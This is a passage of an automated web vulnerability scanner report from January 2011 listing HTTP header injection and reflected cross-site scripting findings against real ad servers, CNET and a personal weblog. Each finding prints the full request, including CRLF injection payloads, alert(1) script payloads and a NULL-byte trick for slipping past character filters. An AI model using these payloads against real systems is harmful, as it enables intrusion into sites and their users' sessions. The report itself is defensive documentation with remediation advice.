The value of REST URL parameter 1 is copied into the Location response header. The payload 82d2a%0d%0a2431e9af5a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /82d2a%0d%0a2431e9af5a3/reg.security.4159/front;tile=1;pos=top;dcove=d;sz=728x90;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/82d2a
2431e9af5a3
/reg.security.4159/front%3Btile%3D1%3Bpos%3Dtop%3Bdcove%3Dd%3Bsz%3D728x90%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:22:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.13. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 56821%0d%0aee102f7460c was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=056821%0d%0aee102f7460c; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=056821
ee102f7460c
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:20:07 GMT
Connection: close


2.14. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3a55%0d%0a27a427f88d was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922091&Page=&PluID=0&Pos=8865\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3a55%0d%0a27a427f88d; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-281/Type-0/7b4b3e72-c3e8-4733-aa25-3c5dffe10972.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3a55
27a427f88d
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fUFGa5O+02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8865\=4164202
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:22:56 GMT
Connection: close


2.15. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 8d759%0d%0a51104ebddf5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=08d759%0d%0a51104ebddf5; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=08d759
51104ebddf5
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:21:00 GMT
Connection: close


2.16. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload c4033%0d%0acf86744927b was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=c4033%0d%0acf86744927b&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=7c038cd2-da51-45cb-9ace-ed6278dfd0773G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=7c038cd2-da51-45cb-9ace-ed6278dfd0773G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=c4033
cf86744927b
&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:26 GMT
Connection: close
Content-Length: 0


2.17. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 760e7%0d%0abee3cb0b4fa was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=760e7%0d%0abee3cb0b4fa HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=aafc6ac3-c8d9-475e-94e2-b0ca1f5b4cee3G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=aafc6ac3-c8d9-475e-94e2-b0ca1f5b4cee3G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=760e7
bee3cb0b4fa
&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:27 GMT
Connection: close
Content-Length: 0


2.18. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 74b8f%0d%0a8312f755b94 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=74b8f%0d%0a8312f755b94&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=024f98eb-350f-4908-b357-ea686989a5173G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=024f98eb-350f-4908-b357-ea686989a5173G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=74b8f
8312f755b94
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:27 GMT
Connection: close
Content-Length: 0


2.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload da838%0d%0a0be295012bc was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1901699&PluID=0&w=300&h=250&ord=2011.01.09.21.57.52&ifrm=2&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: E2=09MY8y8ysF; A2=gn3Ka4JO09MY00008y8ysF; B2=83xP08y8ysF; C3=0u3F8y8ysF0000040_; D3=0u3F00358y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0da838%0d%0a0be295012bc

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0da838
0be295012bc
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La5OG0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP08y8ysF7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F8y8ysF0000040_0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F00358y8ysF0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:02:35 GMT
Connection: close
Content-Length: 2224

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...

2.20. http://download.cnet.com/8737-1_1-0.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8737-1_1-0.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8dbf5%0d%0a555872e04e3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8737-1_1-0.xml8dbf5%0d%0a555872e04e3 HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 12 Jan 2011 03:41:04 GMT
Server: Apache/2.2
Location: http://www.cnet.com/8737-1_1-0.xml8dbf5
555872e04e3

Content-Length: 260
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 12 Jan 2011 03:41:04 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cnet.com/873
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 79 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.insightexpressai.com/adserver/adServer.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.insightexpressai.com
Path:   /adserver/adServer.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0061395'%3balert(1)//6e3b1b635e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61395';alert(1)//6e3b1b635e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adserver/adServer.aspx?publisherID=338&%0061395'%3balert(1)//6e3b1b635e0=1 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:06:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2310=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIControlCounter2310=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIBannerCounter174065=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIBanners2310=174065; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:06:16 GMT
Connection: close
Content-Length: 1427

//174065

var lInsightExpress = {};
   lInsightExpress.AddEvent = function(obj, evType, fn)
   {
       if (obj.addEventListener){
           obj.addEventListener(evType, fn, false);
           return true;
       }
...[SNIP]...
s.type='text/javascript';
s.src = 'http://ad.insightexpressai.com/adServer/GetInvite.aspx?bannerID=174065&referer=www.wired.com&iCompass=true&SiteExpiration=21600&PublisherID=338&.61395';alert(1)//6e3b1b635e0=1&';
document.getElementsByTagName('body')[0].appendChild(s);
}
lInsightExpress.Poll();
   });

3.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00c56e6<a>719b7d4f23f was submitted in the REST URL parameter 1. This input was echoed as c56e6<a>719b7d4f23f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00c56e6<a>719b7d4f23f/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>719b7d4f23f/">weblog%00c56e6<a>719b7d4f23f</a>
...[SNIP]...

3.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00edcf5"><script>alert(1)</script>81045f888fa was submitted in the REST URL parameter 1. This input was echoed as edcf5"><script>alert(1)</script>81045f888fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00edcf5"><script>alert(1)</script>81045f888fa/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00edcf5"><script>alert(1)</script>81045f888fa/2006/">
...[SNIP]...

3.4. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9a9a7<a>1c64490ce0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

